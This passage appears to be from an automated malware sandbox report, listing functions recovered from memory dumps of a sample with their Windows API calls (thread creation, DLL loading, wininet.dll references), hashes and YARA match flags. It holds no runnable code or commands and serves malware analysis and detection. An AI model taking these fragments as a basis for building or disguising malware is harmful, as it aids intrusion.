Associated: 0000000C.00000002.661108198.0000000000B17000.00000040.00000001.sdmp Download File
Associated: 0000000C.00000002.661113209.0000000000B20000.00000040.00000001.sdmp Download File
Associated: 0000000C.00000002.661144031.0000000000B80000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
Instruction ID: e6c77262f5ba2182d122b5874ee39bb292c5f7eee28c199429390ea98cabeb31
Opcode Fuzzy Hash: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
Instruction Fuzzy Hash: 79B01272100940C7E309D724DD06F4B7210FFC0F01F008A3EA00B81851DA38A93CC846

Uniqueness

Uniqueness Score: -1.00%

Function 00A307AC, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00A307B7

Memory Dump Source

Source File: 0000000C.00000002.661014357.0000000000A20000.00000040.00000001.sdmp, Offset: 00A10000, based on PE: true

Associated: 0000000C.00000002.661005017.0000000000A10000.00000040.00000001.sdmp Download File
Associated: 0000000C.00000002.661091576.0000000000B00000.00000040.00000001.sdmp Download File
Associated: 0000000C.00000002.661097627.0000000000B10000.00000040.00000001.sdmp Download File
Associated: 0000000C.00000002.661103096.0000000000B14000.00000040.00000001.sdmp Download File
Associated: 0000000C.00000002.661108198.0000000000B17000.00000040.00000001.sdmp Download File
Associated: 0000000C.00000002.661113209.0000000000B20000.00000040.00000001.sdmp Download File
Associated: 0000000C.00000002.661144031.0000000000B80000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 154562b1c1044579d2961e918a12e94c940bf0a0b9e8e44222bba29e99ad0489
Instruction ID: cdb92b4df541c6703467cf01e2fb590a315ac15b2f911c24ec3250dccee83ae6
Opcode Fuzzy Hash: 154562b1c1044579d2961e918a12e94c940bf0a0b9e8e44222bba29e99ad0489
Instruction Fuzzy Hash: 64B01272200540C7E3099724D906B4B7310FB80F00F008D3AE04781892DB78992CD487

Uniqueness

Uniqueness Score: -1.00%

Function 00A2F9F0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00A2F9FB

Memory Dump Source

Source File: 0000000C.00000002.661014357.0000000000A20000.00000040.00000001.sdmp, Offset: 00A10000, based on PE: true

Associated: 0000000C.00000002.661005017.0000000000A10000.00000040.00000001.sdmp Download File
Associated: 0000000C.00000002.661091576.0000000000B00000.00000040.00000001.sdmp Download File
Associated: 0000000C.00000002.661097627.0000000000B10000.00000040.00000001.sdmp Download File
Associated: 0000000C.00000002.661103096.0000000000B14000.00000040.00000001.sdmp Download File
Associated: 0000000C.00000002.661108198.0000000000B17000.00000040.00000001.sdmp Download File
Associated: 0000000C.00000002.661113209.0000000000B20000.00000040.00000001.sdmp Download File
Associated: 0000000C.00000002.661144031.0000000000B80000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
Instruction ID: 864711eabb7dc0f9c0a00528bc7204798e3bbfe8ecaf20bba7921b9fd7ea0c89
Opcode Fuzzy Hash: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
Instruction Fuzzy Hash: B8B012B2200640C7F3199714D90AF4BB310FBD0F00F00CA3AA00781890DA3C992CC44A

Uniqueness

Uniqueness Score: -1.00%

Function 00A2F900, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00A2F90E

Memory Dump Source

Source File: 0000000C.00000002.661014357.0000000000A20000.00000040.00000001.sdmp, Offset: 00A10000, based on PE: true

Associated: 0000000C.00000002.661005017.0000000000A10000.00000040.00000001.sdmp Download File
Associated: 0000000C.00000002.661091576.0000000000B00000.00000040.00000001.sdmp Download File
Associated: 0000000C.00000002.661097627.0000000000B10000.00000040.00000001.sdmp Download File
Associated: 0000000C.00000002.661103096.0000000000B14000.00000040.00000001.sdmp Download File
Associated: 0000000C.00000002.661108198.0000000000B17000.00000040.00000001.sdmp Download File
Associated: 0000000C.00000002.661113209.0000000000B20000.00000040.00000001.sdmp Download File
Associated: 0000000C.00000002.661144031.0000000000B80000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 8dbcbf5a4d7b7f1c08d6b628364f414bd548082eea0b37b51084cc01ff771fa2
Instruction ID: 05ac91611fc184a3f88202f4b9a2f722369f22817df951cee1fa85cf63676e78
Opcode Fuzzy Hash: 8dbcbf5a4d7b7f1c08d6b628364f414bd548082eea0b37b51084cc01ff771fa2
Instruction Fuzzy Hash: A2B01272605540C7F30ADB04D915B467251FBC0F00F408934E50746590D77D9E38D587

Uniqueness

Uniqueness Score: -1.00%

Function 00A2FAB8, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00A2FAC3

Memory Dump Source

Source File: 0000000C.00000002.661014357.0000000000A20000.00000040.00000001.sdmp, Offset: 00A10000, based on PE: true

Associated: 0000000C.00000002.661005017.0000000000A10000.00000040.00000001.sdmp Download File
Associated: 0000000C.00000002.661091576.0000000000B00000.00000040.00000001.sdmp Download File
Associated: 0000000C.00000002.661097627.0000000000B10000.00000040.00000001.sdmp Download File
Associated: 0000000C.00000002.661103096.0000000000B14000.00000040.00000001.sdmp Download File
Associated: 0000000C.00000002.661108198.0000000000B17000.00000040.00000001.sdmp Download File
Associated: 0000000C.00000002.661113209.0000000000B20000.00000040.00000001.sdmp Download File
Associated: 0000000C.00000002.661144031.0000000000B80000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 8f0c591c5e21216b00dee0cfdb8398dd80d2c6f9bc4c445cb98f30dfaa3fa1de
Instruction ID: c22cab920426f99211259bec297b66dc94c7f77789dfa39603ac798b5fdced38
Opcode Fuzzy Hash: 8f0c591c5e21216b00dee0cfdb8398dd80d2c6f9bc4c445cb98f30dfaa3fa1de
Instruction Fuzzy Hash: 66B01272100544C7E349B714D906B8B7210FF80F00F00893AA00782861DB389A2CE996

Uniqueness

Uniqueness Score: -1.00%

Function 00A2FAE8, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00A2FAF3

Memory Dump Source

Source File: 0000000C.00000002.661014357.0000000000A20000.00000040.00000001.sdmp, Offset: 00A10000, based on PE: true

Associated: 0000000C.00000002.661005017.0000000000A10000.00000040.00000001.sdmp Download File
Associated: 0000000C.00000002.661091576.0000000000B00000.00000040.00000001.sdmp Download File
Associated: 0000000C.00000002.661097627.0000000000B10000.00000040.00000001.sdmp Download File
Associated: 0000000C.00000002.661103096.0000000000B14000.00000040.00000001.sdmp Download File
Associated: 0000000C.00000002.661108198.0000000000B17000.00000040.00000001.sdmp Download File
Associated: 0000000C.00000002.661113209.0000000000B20000.00000040.00000001.sdmp Download File
Associated: 0000000C.00000002.661144031.0000000000B80000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
Instruction ID: bb22edd625d441e86b4201bf2007cb1784deb073e32f09f3a807e6c8f80ed535
Opcode Fuzzy Hash: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
Instruction Fuzzy Hash: ACB01272104544C7F3099714ED06B8B7210FB80F00F00893AA007828A1DB39992CE456

Uniqueness

Uniqueness Score: -1.00%

Function 00A2FAD0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00A2FADB

Memory Dump Source

Source File: 0000000C.00000002.661014357.0000000000A20000.00000040.00000001.sdmp, Offset: 00A10000, based on PE: true

Associated: 0000000C.00000002.661005017.0000000000A10000.00000040.00000001.sdmp Download File
Associated: 0000000C.00000002.661091576.0000000000B00000.00000040.00000001.sdmp Download File
Associated: 0000000C.00000002.661097627.0000000000B10000.00000040.00000001.sdmp Download File
Associated: 0000000C.00000002.661103096.0000000000B14000.00000040.00000001.sdmp Download File
Associated: 0000000C.00000002.661108198.0000000000B17000.00000040.00000001.sdmp Download File
Associated: 0000000C.00000002.661113209.0000000000B20000.00000040.00000001.sdmp Download File
Associated: 0000000C.00000002.661144031.0000000000B80000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: a3c9a84db5a1b27ba292bbe6ac7156695ca75f7b31983341e9d88d14b699633e
Instruction ID: b885d126f35a04098635745a666b93c7a8e67e4acbf17db3f6051f78ecae7b76
Opcode Fuzzy Hash: a3c9a84db5a1b27ba292bbe6ac7156695ca75f7b31983341e9d88d14b699633e
Instruction Fuzzy Hash: 9AB01273104944C7E349A714DD06B8B7210FBC0F01F00893AA00786851DB389A2CE986

Uniqueness

Uniqueness Score: -1.00%

Function 00A2FBB8, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00A2FBC3

Memory Dump Source

Source File: 0000000C.00000002.661014357.0000000000A20000.00000040.00000001.sdmp, Offset: 00A10000, based on PE: true

Associated: 0000000C.00000002.661005017.0000000000A10000.00000040.00000001.sdmp Download File
Associated: 0000000C.00000002.661091576.0000000000B00000.00000040.00000001.sdmp Download File
Associated: 0000000C.00000002.661097627.0000000000B10000.00000040.00000001.sdmp Download File
Associated: 0000000C.00000002.661103096.0000000000B14000.00000040.00000001.sdmp Download File
Associated: 0000000C.00000002.661108198.0000000000B17000.00000040.00000001.sdmp Download File
Associated: 0000000C.00000002.661113209.0000000000B20000.00000040.00000001.sdmp Download File
Associated: 0000000C.00000002.661144031.0000000000B80000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 7ba0f55f1fd72216c7a5d20d06c619025faf51988f765d7a98e58a350c3ee9ce
Instruction ID: 98b7ab4c3374ce945d87304c272764997da5ea40185bb6170513ade09291bf69
Opcode Fuzzy Hash: 7ba0f55f1fd72216c7a5d20d06c619025faf51988f765d7a98e58a350c3ee9ce
Instruction Fuzzy Hash: 97B012721005C4C7E30D9714D906B8F7210FB80F00F00893AA40782861DB789A2CE45A

Uniqueness

Uniqueness Score: -1.00%

Function 00A2FB68, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00A2FB73

Memory Dump Source

Source File: 0000000C.00000002.661014357.0000000000A20000.00000040.00000001.sdmp, Offset: 00A10000, based on PE: true

Associated: 0000000C.00000002.661005017.0000000000A10000.00000040.00000001.sdmp Download File
Associated: 0000000C.00000002.661091576.0000000000B00000.00000040.00000001.sdmp Download File
Associated: 0000000C.00000002.661097627.0000000000B10000.00000040.00000001.sdmp Download File
Associated: 0000000C.00000002.661103096.0000000000B14000.00000040.00000001.sdmp Download File
Associated: 0000000C.00000002.661108198.0000000000B17000.00000040.00000001.sdmp Download File
Associated: 0000000C.00000002.661113209.0000000000B20000.00000040.00000001.sdmp Download File
Associated: 0000000C.00000002.661144031.0000000000B80000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
Instruction ID: fe3894545e6d7ff35e2d014bd1b41c27fc981d7cba2425ddd0908e3dd582fca9
Opcode Fuzzy Hash: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
Instruction Fuzzy Hash: 17B01272100544C7E3099714D906B8B7210FB80F00F008E3AA04782991DB78992DE446

Uniqueness

Uniqueness Score: -1.00%

Function 00A2FB50, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00A2FB5B

Memory Dump Source

Source File: 0000000C.00000002.661014357.0000000000A20000.00000040.00000001.sdmp, Offset: 00A10000, based on PE: true

Associated: 0000000C.00000002.661005017.0000000000A10000.00000040.00000001.sdmp Download File
Associated: 0000000C.00000002.661091576.0000000000B00000.00000040.00000001.sdmp Download File
Associated: 0000000C.00000002.661097627.0000000000B10000.00000040.00000001.sdmp Download File
Associated: 0000000C.00000002.661103096.0000000000B14000.00000040.00000001.sdmp Download File
Associated: 0000000C.00000002.661108198.0000000000B17000.00000040.00000001.sdmp Download File
Associated: 0000000C.00000002.661113209.0000000000B20000.00000040.00000001.sdmp Download File
Associated: 0000000C.00000002.661144031.0000000000B80000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 445a353fbf322f74478a6659fdc04cf8623378f6e443218e16a25411f5af12d5
Instruction ID: 24e1bc86294fbd7a1654c33a96a754a721993c998c3fcb69f8e89524a52cb594
Opcode Fuzzy Hash: 445a353fbf322f74478a6659fdc04cf8623378f6e443218e16a25411f5af12d5
Instruction Fuzzy Hash: 54B01272201544C7E3099B14D906F8B7210FB90F00F00893EE00782851DB38D92CE447

Uniqueness

Uniqueness Score: -1.00%

Function 00A2FC60, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00A2FC6B

Memory Dump Source

Source File: 0000000C.00000002.661014357.0000000000A20000.00000040.00000001.sdmp, Offset: 00A10000, based on PE: true

Associated: 0000000C.00000002.661005017.0000000000A10000.00000040.00000001.sdmp Download File
Associated: 0000000C.00000002.661091576.0000000000B00000.00000040.00000001.sdmp Download File
Associated: 0000000C.00000002.661097627.0000000000B10000.00000040.00000001.sdmp Download File
Associated: 0000000C.00000002.661103096.0000000000B14000.00000040.00000001.sdmp Download File
Associated: 0000000C.00000002.661108198.0000000000B17000.00000040.00000001.sdmp Download File
Associated: 0000000C.00000002.661113209.0000000000B20000.00000040.00000001.sdmp Download File
Associated: 0000000C.00000002.661144031.0000000000B80000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: b6c387d48eb785842166a0bd4fb6c7cae32a88c5d36fa47243e2a3f83643301c
Instruction ID: 69502d12976c3e383ebc8ea250e6427301c1fd9f045747c541fd94b810363c34
Opcode Fuzzy Hash: b6c387d48eb785842166a0bd4fb6c7cae32a88c5d36fa47243e2a3f83643301c
Instruction Fuzzy Hash: 3AB01277105940C7E349A714DD0AB5B7220FBC0F01F00893AE00781890DA38993CC54A

Uniqueness

Uniqueness Score: -1.00%

Function 00A2FD8C, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00A2FD9A

Memory Dump Source

Source File: 0000000C.00000002.661014357.0000000000A20000.00000040.00000001.sdmp, Offset: 00A10000, based on PE: true

Associated: 0000000C.00000002.661005017.0000000000A10000.00000040.00000001.sdmp Download File
Associated: 0000000C.00000002.661091576.0000000000B00000.00000040.00000001.sdmp Download File
Associated: 0000000C.00000002.661097627.0000000000B10000.00000040.00000001.sdmp Download File
Associated: 0000000C.00000002.661103096.0000000000B14000.00000040.00000001.sdmp Download File
Associated: 0000000C.00000002.661108198.0000000000B17000.00000040.00000001.sdmp Download File
Associated: 0000000C.00000002.661113209.0000000000B20000.00000040.00000001.sdmp Download File
Associated: 0000000C.00000002.661144031.0000000000B80000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: bc46901120b7194c8a84a042a6f6d6e6859f3849350b0ab548ee1941b68cff92
Instruction ID: c46011bb0c46dfed5c8ab186c0f719e5b9e72ad0d6ef7da6a0d9d2ed8661a3c9
Opcode Fuzzy Hash: bc46901120b7194c8a84a042a6f6d6e6859f3849350b0ab548ee1941b68cff92
Instruction Fuzzy Hash: 8FB0927110054087E205A704D905B4AB212FB90B00F808A35A4468A591D66A9A28C686

Uniqueness

Uniqueness Score: -1.00%

Function 00A2FDC0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00A2FDCB

Memory Dump Source

Source File: 0000000C.00000002.661014357.0000000000A20000.00000040.00000001.sdmp, Offset: 00A10000, based on PE: true

Associated: 0000000C.00000002.661005017.0000000000A10000.00000040.00000001.sdmp Download File
Associated: 0000000C.00000002.661091576.0000000000B00000.00000040.00000001.sdmp Download File
Associated: 0000000C.00000002.661097627.0000000000B10000.00000040.00000001.sdmp Download File
Associated: 0000000C.00000002.661103096.0000000000B14000.00000040.00000001.sdmp Download File
Associated: 0000000C.00000002.661108198.0000000000B17000.00000040.00000001.sdmp Download File
Associated: 0000000C.00000002.661113209.0000000000B20000.00000040.00000001.sdmp Download File
Associated: 0000000C.00000002.661144031.0000000000B80000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
Instruction ID: d88988b585cc81dca5f800d6bb39f1198a76ae257c125849f4a62a02810904f6
Opcode Fuzzy Hash: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
Instruction Fuzzy Hash: 20B01272140540C7E30A9714DA56B4B7220FB80F40F008D3AA04781891DBB89B2CD486

Uniqueness

Uniqueness Score: -1.00%

Function 00A2FED0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00A2FEDB

Memory Dump Source

Source File: 0000000C.00000002.661014357.0000000000A20000.00000040.00000001.sdmp, Offset: 00A10000, based on PE: true

Associated: 0000000C.00000002.661005017.0000000000A10000.00000040.00000001.sdmp Download File
Associated: 0000000C.00000002.661091576.0000000000B00000.00000040.00000001.sdmp Download File
Associated: 0000000C.00000002.661097627.0000000000B10000.00000040.00000001.sdmp Download File
Associated: 0000000C.00000002.661103096.0000000000B14000.00000040.00000001.sdmp Download File
Associated: 0000000C.00000002.661108198.0000000000B17000.00000040.00000001.sdmp Download File
Associated: 0000000C.00000002.661113209.0000000000B20000.00000040.00000001.sdmp Download File
Associated: 0000000C.00000002.661144031.0000000000B80000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
Instruction ID: 9b30904a3bfeb6814e26683714e5c097bc05a41d35c26203adaeaac906fc0f52
Opcode Fuzzy Hash: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
Instruction Fuzzy Hash: C9B01272100580C7E34EA714D906B4B7210FB80F00F408A3AA00781891DB789B2CD98A

Uniqueness

Uniqueness Score: -1.00%

Function 00A2FFB4, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00A2FFBF

Memory Dump Source

Source File: 0000000C.00000002.661014357.0000000000A20000.00000040.00000001.sdmp, Offset: 00A10000, based on PE: true

Associated: 0000000C.00000002.661005017.0000000000A10000.00000040.00000001.sdmp Download File
Associated: 0000000C.00000002.661091576.0000000000B00000.00000040.00000001.sdmp Download File
Associated: 0000000C.00000002.661097627.0000000000B10000.00000040.00000001.sdmp Download File
Associated: 0000000C.00000002.661103096.0000000000B14000.00000040.00000001.sdmp Download File
Associated: 0000000C.00000002.661108198.0000000000B17000.00000040.00000001.sdmp Download File
Associated: 0000000C.00000002.661113209.0000000000B20000.00000040.00000001.sdmp Download File
Associated: 0000000C.00000002.661144031.0000000000B80000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
Instruction ID: 7e2af0442ae64c9f6bb8df8c94f4cb17495a0f0e8e42cafe04a2b86fa0e4786e
Opcode Fuzzy Hash: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
Instruction Fuzzy Hash: A2B012B2104580C7E3099714D906F4B7210FB90F00F40893EA00F81851DB3CD92CD44A

Uniqueness

Uniqueness Score: -1.00%

Function 00097300, Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 90sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(000007D0), ref: 000973A8

Strings

net.dll, xrefs: 00097371, 000973F7, 000973CF, 000973DB, 00097403
wininet.dll, xrefs: 0009735E, 00097367

Memory Dump Source

Source File: 0000000C.00000002.660726182.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: false

Yara matches

Similarity

API ID: Sleep
String ID: net.dll$wininet.dll
API String ID: 3472027048-1269752229
Opcode ID: f6849af2dd7d4cb45c3465c94f54ef7ad64f1e9a343c7c9436ffbc3826bd7c94
Instruction ID: 504eee7fa00a955a9f59d6832465abf736e1fd9c7d0fda7a34627d4d75ebbddc
Opcode Fuzzy Hash: f6849af2dd7d4cb45c3465c94f54ef7ad64f1e9a343c7c9436ffbc3826bd7c94
Instruction Fuzzy Hash: 793190B6605600ABCB11EF64C8A1FABB7F8BF88700F00811DFA5D5B242D730A545DBE0

Uniqueness

Uniqueness Score: -1.00%

Function 000972FB, Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 76sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(000007D0), ref: 000973A8

Strings

net.dll, xrefs: 00097371, 000973CF, 000973DB
wininet.dll, xrefs: 0009735E, 00097367

Memory Dump Source

Source File: 0000000C.00000002.660726182.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: false

Yara matches

Similarity

API ID: Sleep
String ID: net.dll$wininet.dll
API String ID: 3472027048-1269752229
Opcode ID: 453f074eb243f6c42dd360dac87235a31250c600e11c876bca7fdf4a226ab68c
Instruction ID: bb721c0ed7b37bc65e855a0019dc4e829dba1526f5ec7d3749f3f50e2a604189
Opcode Fuzzy Hash: 453f074eb243f6c42dd360dac87235a31250c600e11c876bca7fdf4a226ab68c
Instruction Fuzzy Hash: 7F21A1B6645200ABCB14DF64C8A1FABB7B4FF88700F04812DFA1D5B242D774A545EBE1

Uniqueness

Uniqueness Score: -1.00%

Function 00098922, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 31memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00083B93), ref: 0009891D

Strings

.z`, xrefs: 0009890C, 00098918

Memory Dump Source

Source File: 0000000C.00000002.660726182.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: false

Yara matches

Similarity

API ID: FreeHeap
String ID: .z`
API String ID: 3298025750-1441809116
Opcode ID: a05ec17e7f9f0d10d431df1331ebf750c511b1b0f8539fc09e21d4b323c1b510
Instruction ID: db9df76cb9ca4144f95f49c87282890742f773044edd62c831f434ddbdce2848
Opcode Fuzzy Hash: a05ec17e7f9f0d10d431df1331ebf750c511b1b0f8539fc09e21d4b323c1b510
Instruction Fuzzy Hash: 98F085B12042096BCB18DF98CC49EEB3769BF89750F108058FD089B352DA30E901CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 000988E2, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 27memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00083B93), ref: 0009891D

Strings

.z`, xrefs: 0009890C, 00098918

Memory Dump Source

Source File: 0000000C.00000002.660726182.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: false

Yara matches

Similarity

API ID: FreeHeap
String ID: .z`
API String ID: 3298025750-1441809116
Opcode ID: d9d257eb632d21a4ed4dcdef5d0637cdb087d4db4e7ac56a1bc295fe11807e82
Instruction ID: 4521a816cc41379d1a8a8e5d2cf88674817c729db961cc05a7ae13da9a138511
Opcode Fuzzy Hash: d9d257eb632d21a4ed4dcdef5d0637cdb087d4db4e7ac56a1bc295fe11807e82
Instruction Fuzzy Hash: 17E06DBA244604BFCB18DF98CC45EA77769FF88350F014549FD289B356C230E914CAA1

Uniqueness

Uniqueness Score: -1.00%

Function 000988B0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(65,?,00093CAF,00093CAF,?,00093536,?,?,?,?,?,00000000,00000000,?), ref: 000988DD

Strings

65, xrefs: 000988D2, 000988DC

Memory Dump Source

Source File: 0000000C.00000002.660726182.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: false

Yara matches

Similarity

API ID: AllocateHeap
String ID: 65
API String ID: 1279760036-71973410
Opcode ID: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
Instruction ID: 8f0b2ce5bc93fd7dbce2f470bf66c9c7477deaaa04d19c13c71560de508be073
Opcode Fuzzy Hash: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
Instruction Fuzzy Hash: AAE012B1200208ABDB14EF99CC45EA777ACAF88650F118558FE085B242C630F910CAB0

Uniqueness

Uniqueness Score: -1.00%

Function 000988F0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00083B93), ref: 0009891D

Strings

.z`, xrefs: 0009890C, 00098918

Memory Dump Source

Source File: 0000000C.00000002.660726182.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: false

Yara matches

Similarity

API ID: FreeHeap
String ID: .z`
API String ID: 3298025750-1441809116
Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
Instruction ID: 8ad667a8d8af2a529c747e2386ca6dc94712dd4300a2ae308ca08767a62ccff1
Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
Instruction Fuzzy Hash: C1E046B1200208ABDB18EF99CC49EE777ACEF88750F018558FE085B252C630F910CAF0

Uniqueness

Uniqueness Score: -1.00%

Function 00087280, Relevance: 3.1, APIs: 2, Instructions: 55threadwindowCOMMON

Download Yara Rule

APIs

PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 000872DA
PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 000872FB

Memory Dump Source

Source File: 0000000C.00000002.660726182.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: false

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: 300e4c37a824aaf62712f5ab898da9fb0a13bc962142d5f21046bcb548a99a2f
Instruction ID: 48a2d3edaf6d380338e08a2f8d3dbc2de40968873e5ffb36209caaf51e4cdaba
Opcode Fuzzy Hash: 300e4c37a824aaf62712f5ab898da9fb0a13bc962142d5f21046bcb548a99a2f
Instruction Fuzzy Hash: FE01DB31A8022977EB21B6949C03FFE776C6B41F51F140114FF04BA1C2EAD4A90647F6

Uniqueness

Uniqueness Score: -1.00%

Function 00089B40, Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON

Download Yara Rule

APIs

LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00089BB2

Memory Dump Source

Source File: 0000000C.00000002.660726182.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: false

Yara matches

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: 95fb8e7be991e7a3834cfd23532fdb6265e305c358471754a12ee14398f87ec4
Instruction ID: 53dd027b0aafa55acff66743f32f45c708bbf3703d9ffba8837c951fa7d649db
Opcode Fuzzy Hash: 95fb8e7be991e7a3834cfd23532fdb6265e305c358471754a12ee14398f87ec4
Instruction Fuzzy Hash: A60100B5D0010DBBDF10EAE4ED42FEDB3B8AB54718F0441A5A91897241F631EB149791

Uniqueness

Uniqueness Score: -1.00%

Function 00097430, Relevance: 1.5, APIs: 1, Instructions: 36threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,0008CCF0,?,?), ref: 0009746C

Memory Dump Source

Source File: 0000000C.00000002.660726182.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: false

Yara matches

Similarity

API ID: CreateThread
String ID:
API String ID: 2422867632-0
Opcode ID: 8e7047a9cb8df936ba72e981128d582d5b245ee00216b9e7364ec18dfb279628
Instruction ID: 4bd8b2932fb0bcf1c4de38e40de54d6011fe41f9a6681a2b52aad78da9002eab
Opcode Fuzzy Hash: 8e7047a9cb8df936ba72e981128d582d5b245ee00216b9e7364ec18dfb279628
Instruction Fuzzy Hash: 5FE092333903043AEB3065A9AC03FE7B39CCB81B24F540026FA4DEB2C2D595F80152A8

Uniqueness

Uniqueness Score: -1.00%

Function 00097426, Relevance: 1.5, APIs: 1, Instructions: 33threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,0008CCF0,?,?), ref: 0009746C

